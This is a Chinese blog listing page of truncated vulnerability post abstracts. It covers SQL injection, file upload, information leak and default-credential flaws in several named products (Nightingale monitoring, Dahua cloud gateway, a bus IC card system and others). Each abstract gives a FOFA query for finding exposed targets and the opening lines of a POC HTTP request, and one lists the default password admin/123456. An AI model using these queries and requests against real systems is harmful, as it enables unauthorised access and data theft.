摘要:
描述 夜莺开源监控系统存在默认用户漏洞,/v1/n9e/接口401鉴权存在默认用户 fofa icon_hash="-2047686847" POC GET /v1/n9e/users HTTP/1.1 Host: monitor.xxxx.com Cache-Control: max-age=0 阅读全文
摘要:
描述 网动统一通信平台是采用统一的通信平台,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台,接口/acenter/iactiveEnterMeeting.action?roomid=1&username=admin存在信息泄露漏洞,可能导致管理员密码泄露获取后台权限等。 fofa ti 阅读全文
摘要:
描述 瑞格智慧心理服务平台NPreenSMSList.asmx存在sql注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全 fofa body="瑞格智慧心理服务平台" POC POST /NPreenManage/NPreenSMSList.as 阅读全文
摘要:
描述 公交IC卡收单管理系统bus存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全 fofa app="公交IC卡收单管理系统" POC 该管理系统存在默认密码admin/123456,在进行登录的时候进行抓包获取cookie POST 阅读全文
摘要:
描述 公交IC卡收单管理系统信息泄露漏洞,通过泄露的账户密码 登录后台系统 fofa app="公交IC卡收单管理系统" POC POST /assets/..;/user HTTP/1.1 Host: xxk.xzssmk.com:8080 Cache-Control: max-age=0 Upg 阅读全文
摘要:
描述 北京神州视翰科技有限公司分诊叫号后台系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限 fofa title="分诊叫号后台" POC POST /api/doctor/ HTTP/1.1 Host: Content-Length: 756 Cache-Control: max-age 阅读全文
摘要:
描述 大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747),允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 fofa title="智能云网关注册管理平台" POC POST /index.php/User/doLogin HTT 阅读全文
摘要:
描述 百易云资产管理运营系统ufile.api.php存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限 fofa body="不要着急,点此" POC GET /api/file/ufile 阅读全文
